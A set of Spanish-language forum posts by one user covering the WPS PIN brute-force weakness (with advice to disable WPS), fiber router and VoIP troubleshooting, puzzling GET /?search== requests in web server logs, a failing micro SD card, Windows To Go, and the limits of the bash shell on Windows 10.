El WPS no es un sistema de seguridad en sí mismo, sino una manera de "facilitar" una conexión IEEE 802.11i, entre un cliente y un router que hace de servidor. El sistema es sencillo, el cliente mediante un pin de 8 dígitos contacta con el router que hace de servidor EAP, si el pin es correcto, el router (servidor) manda la clave precompartida al cliente, para que inicie la conexión de manera tradicional.

Este sistema es muy vulnerable a ataques de fuerza bruta, ya que el sistema de autenticación se basa en dos bloques de 4 dígitos, por lo que las combinaciones posibles se reducen a 10.000 posibilidades del primer bloque de 4 dígitos, más 1.000 posibilidades del bloque siguiente de 4 digitos (3 + 1 checksum), o en caso de que no tenga checksum, serian otras 10.000 combinaciones, por lo que el total de combinaciones posibles son 11.000 (20 h) en caso de tener checksum, y 20.000 (40 h) en caso de no tener checksum.

Visto lo anterior, y dado lo vulnerable de este sistema se desaconseja tener activado el WPS en el router, ya que como hemos visto, aunque tengamos el sistema más robusto WPA2 con el cifrado más robusto CCMP con el algoritmo de clave simétrica AES, en cuestión de 20h/40h un atacante puede obtener la clave por fuerza bruta explotando la vulnerabilidad del WPS.

Fuente yo  ;D

#20
Bueno, hay varios tutoriales para hacer lo que describo en el titulo.

Básicamente la conexión consiste conectar la boca ethernet WAN del router neutro a la boca ethernet de la ONT (el cacharrito que transforma los impulsos eléctricos en luz para la fibra óptica), y en la configuración WAN del router neutro configuras ip dinámica y con vlan 1074.

Bien, con eso ya estas online para Internet, ahora viene la segunda parte, conectar el router ZTE H218N al router neutro, para lo cual necesitas acceder como administrador, por ahi explican como conseguir esa clave por ingeniería inversa, en mi caso fue tan sencillo como pulsar 10 segundos el botón del reset y acceder como admin/admin, si alguno opta por esta opción, hay que hacerlo lo primero de todo y conectado a la ONT, ya que cuando se resetea, vuelve a obtener todos los parámetros para la conexión automáticamente.

Una vez que hemos ingresado nos vamos a la configuración WanConnection y desmarcamos el tic que esta en vlan y guardamos los cambios. Hasta ahí todo bien ahora solo nos queda enchufar la boca WAN del ZTE H218N a cualquiera de las bocas LAN del router neutro.

Ahora entramos en la madre del cordero, consigo Internet, pero el teléfono Voip no se me registra, el motivo ni idea, he probado abriendo puertos, creando rutas estáticas a los servidores de Jazztel, desactivando el firewall, activando QoS para dar prioridad a Voip, en fin, solo consigo Internet en el ZTE H218N pero nada de Voip. También he probado a conectar el ZTE H218N con la vlan 1074 activada, con este método no tengo ni Internet y mucho menos Voip.

Después de hacer varios experimentos, algunos válidos pero no óptimos como poner un switch entre la ONT, enchufar primero el router ZTE H218N (con su vlan 1074 activada), se conecta como si te lo hubiera instalado el técnico, y después enchufo el router neutro que me da la opción de clonar la mac del ZTE, y entonces engancha también con la ONT; este sistema funciona, pero si intentas acceder desde el exterior, da problemas (obvio, conflicto de ip), pero si solo quieres navegar funciona perfectamente.

Al final se me ocurre a conectar el ZTE H218N a mi servidor que tiene dos tarjetas ethernet, una integrada y una USB según el siguiente esquema

ONT-----ROUTER NEUTRO-------SERVIDOR------ROUTER ZTE H218N (vlan 1074 desconectada)

y en el servidor que tengo con windows, comparto la ethernet con la ethernet 2 en el menú de conexiones de red, y así obtiene internet y se registra la Voip, por lo que también tengo teléfono.

Luego, mande ? ? ? ? ? ? ? , vuelvo a conectar el ZTE H218N al router neutro directamente, y lo mismo de antes, solo Internet, la Voip no se registra, así que vuelvo a conectar al server y se conecta sin problemas.

Alguien tiene una explicación lógica?

El servidor coge la conexión del router neutro, luego, ¿que es lo que pasa para que no pueda conectarlo directamente?

A ver si alguien me arroja un poquito de luz, porque no entiendo este expediente X.

Lo único que se me ocurre es que el ZTE H218N detecta que la WAN esta conectada a otro router por la MAC y bloquea ese registro de la Voip, pero no creo que haya un subproceso corriendo en el firmware del router y que ademas tenga la base de datos de todas las mac de fabricantes de router.

Lo dicho, a ver si alguien me da una teoría plausible.

edito: ahondando en la teoria anterior, he probado a cambiar la subred privada de los puertos LAN del router neutro de 192.168.0.0 a 192.168.137.0 que es la subred que crea Windows cuando compartes las interfaces, y nada que si enchufo directamente me como un colín.

#21
Redes / Requested GET /?search==
26 Enero 2017, 19:17 PM
Esta tarde revisando los log de mi servidor web me he encontrado con estas peticiones que no había visto nunca

10:25:51 223.74.203.215:5417 Requested GET /?search==11:31:14 163.172.66.79:55036 Requested GET /articulos-renovar-pc-sin-reinstalar-so.html
11:53:26 118.193.157.132:62304 Requested GET /?search==12:16:37 220.135.159.86:45865 Requested GET /



donde tenemos una primera parte de la peticion:

10:25:51 223.74.203.215:5417 Requested GET /?search==
11:53:26 118.193.157.132:62304 Requested GET /?search==


en la que podemos ver la hora de conexion, la ip de origen, en estos casos las dos son de china, y luego el Requested GET /?search==

en la segunda parte de la peticion:

11:31:14 163.172.66.79:55036 Requested GET /articulos-renovar-pc-sin-reinstalar-so.html
12:16:37 220.135.159.86:45865 Requested GET /


podemos ver una hora totalmente distinta y una segunda ip, una es francesa y otra es de taiwan


163.172.66.79

País:France
Estado:Ile-de-France
Cidade:Paris

Provedor:Online S.A.S.
IP-Reverso:163-172-66-79.rev.poneytelecom.eu


220.135.159.86

País:Taiwan, Province Of China
Estado:T'ai-wan
Cidade:Yilan

Provedor:Chunghwa Telecom Co. Ltd.
IP-Reverso:220-135-159-86.HINET-IP.hinet.net


las ip,s francesa y taiwanesa pertenecen a servicios de hosting.

investigando un poco en google sobre la query, me he encontrado con httpie

Citar5.1   Querystring parameters

If you find yourself manually constructing URLs with querystring parameters on the terminal, you may appreciate the param==value syntax for appending URL parameters. With that, you don't have to worry about escaping the & separators for your shell. Also, special characters in parameter values, will also automatically escaped (HTTPie otherwise expects the URL to be already escaped). To search for HTTPie logo on Google Images you could use this command:

$ http www.google.com search=='HTTPie logo' tbm==isch
GET /?search=HTTPie+logo&tbm=isch HTTP/1.1


en principio httpie no deja de ser una aplicación para hacer peticiones web desde consola

https://github.com/jkbrzt/httpie

al parecer todo apunta a que se trata de eso, una petición desde una shell, pero lo que no me cuadra son las segundas ip,s y sobre todo el desfase horario.

mis teorias son:

1. acceso de chinos a través de servicios de hosting externos a china tipo proxy, pero no me cuadra que me salga la ip de origen de china, ya que cuando accedo a mi web a traves de un proxy solo se queda en el log la ip del proxy y es una peticion post o get normal, y tampoco me cuadra el desfase horario

2. que las segundas ip,s son el objetivo de las ip,s de china, y lo que hacen es que lanzan una query a mi servidor web preguntando por esas ip,s a ver si obtienen algún tipo de respuesta, pero tampoco me cuadra el desfase horario en esta teoría.

a ver si alguien me arroja un poquito de luz sobre el tema, ya que igual es una tontería y me estoy haciendo pajas mentales





#22
Buenas,

me estoy pegando con una tarjeta micro SD para intentar sacarle la información.

La meto en un adaptador de micro SD a SD (ya probé con distintos adaptadores)

Desde windows:

Si la meto en el lector de tarjetas de mi portátil directamente no me la reconoce.

si lo hago a traves de un lector de tarjetas usb si, pero cuando intento acceder me sale

CitarNo se puede obtener acceso a H:\.

Función incorrecta

desde cmd tampoco tengo acceso

CitarMicrosoft Windows [Versión 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.

C:\WINDOWS\system32>chkdsk h:
No se puede abrir el volumen para acceso directo.

programas como testdisk, HD LLF no la reconocen y recuva la reconoce pero no puede acceder.

Desde Linux:


Si la meto en el lector de tarjetas de mi portátil no me la reconoce.

desde el lector de tarjetas usb gparted me la detecta como un disco de 2 Teras, si intento crear una tabla de particiones me da error.

¿Alguna idea a parte de tirarla a la basura?

thanks
#23
Windows / Windows To Go
9 Agosto 2016, 22:14 PM
Con su nueva actualización de Windows 10, "Anniversary", Microsoft ha introducido una nueva característica que solo tenía reservada para las versiones Enterprise desde Windows 8.

Si uno va a Panel de Control, y si tiene seleccionada la vista clásica de iconos, vera que el último icono que le aparece es Windows To Go, ¿y exactamente qué es esto de Windows To Go?

Pues es una utilidad que permite instalar un Windows 10 en un pendrive o disco duro USB. No hay que llevarse a engaño, no es una Live USB, es una instalación de Windows 10 en toda regla, pero en un dispositivo USB.

Lo que si permite esta instalación, es poder hacer uso de este Windows 10 en cualquier PC, obviamente con la lentitud que tiene el ir leyendo/escribiendo en un Pendrive.

Bueno vamos a explicar paso a paso como se hace esto, damos doble click al icono de Windows To Go.

                   
Nos sale una ventana donde nos da a elegir los dispositvos USB.

                   
Si selecciono el pendrive me da un bonito mensaje de que no es compatible, pues buscando en internet te enteras de que hay 4 modelos compatibles.

                   
Bueno pues selecciono mi disco duro, que ese si me deja, y ahora viene cuando la matan, me pide que meta la imagen .wim del disco de instalación, pero resulta que mi Windows 10 es pro y la imagen tiene la extensión .esd

Bueno ni corto ni perezoso, me descargo un programita que convierte los .esd en .win, le indico la ruta de la imagen, me la detecta y me dice el programa muy vehementemente que es una imagen de Windows 10 Pro que necesito una imagen de Windows 10 Enterprise.

                   
Si es que no leo, te lo dice al principio "imágenes de empresa", pero vaya bug más gordo, resulta que te regalan una funcionalidad con la actualización y no la puedes usar con tu Windows.

Bueno, como estoy decido a probarlo, me descargo una versión demo de Windows 10 Enterprise, y la instalo en el disco duro.

Una vez que terminas solo tienes que reiniciar, modificar la BIOS para que arranque desde dispositivos USB, y comerte todo el proceso de una instalación nuevecita de Windows 10, con la lentitud que conlleva que esta instalándolo en un medio USB.

Eso sí, una vez finalizado el proceso, lo puedes utilizar en "cualquier dispositivo", lo pongo entre comillas, porque si instalas un Windows 10 x64 no puedes pretender que te funcione en un PC o tableta de x86 (32 bits), sin embargo al revés sí.

Como le he visto utilidad al asunto, resulta que hay un programita que se llama WinToUSB, que tiene una versión gratuita que te permite, saltarte la restricción de uso de pendrives "no compatibles" al igual que admite imágenes .esd

Y como no, me he hecho mi mod de Hiren's Boot Cd con Windows 10, que el mini xp ya no me reconocía ni la mitad de equipos nuevos.


Fuente: yo  ;D
#24
Windows / Shell Bash en Windows 10
5 Agosto 2016, 21:13 PM
Ayer 4 de agosto, Microsoft puso a disposición su nueva actualización de Windows 10, "Anniversary", en la cual incluyen la consola de bash en estado beta, ya lleva así más de 6 meses.

                   
Como ya comenté en otro de mis artículos tenía pocas esperanzas puesta en esta Shell, y mis temores se han confirmado plenamente, todo lo que tiene que ver con los interfaces de red, no funciona.

Después de verificar que estaban instaladas las net-tools, y de instalar las wireless-tools, y los paquetes iw, wpasupplicant, hostapd, dhcpcd, dnsmasq, arp-scan, lighttpd y la suite aircrack, la conclusión es que todo lo que tiene que ver con interfaces de red no funciona.

Si tecleamos un simple ifconfig, nos da la primera en la frente.

                   
"Atención: no se puede abrir /proc/net/dev (No existe el archivo o el directorio). Salida limitada."

Si probamos con airmon-ng de la suite aircrack, no detecta ningún interface.

                   
Si hacemos un iwconfig, parece que nos detecta algo, aunque no es real, nada que rascar.

                   
Hasta he probado levantar un servidor web con lighttpd para ver si por casualidad cargaba la web en localhost, ya que en Windows tengo los interface activos, pero nada de nada.

Y ya de hostapd, arp-scan, etc, nos olvidamos, todo paquete de Linux en el que tenga que ver un interface, no os funcionará.

Como he dicho antes, no tenía grandes esperanzas en esta Shell, ya que habían anunciado que no iba a ser una Shell virtualizada sino que sería independiente de Windows, pero ahí entonces se entra en los conflictos de kernels, por que el kernel de Linux no existe, y los paquetes Linux no pueden manejar el kernel de Windows porque obviamente estan hechos para Linux.

La pregunta que me surge es ¿Para qué vale entonces esta Shell de bash en Windows?

Esta en modo beta, pero no creo que esto mejore.

Fuente: yo  ;D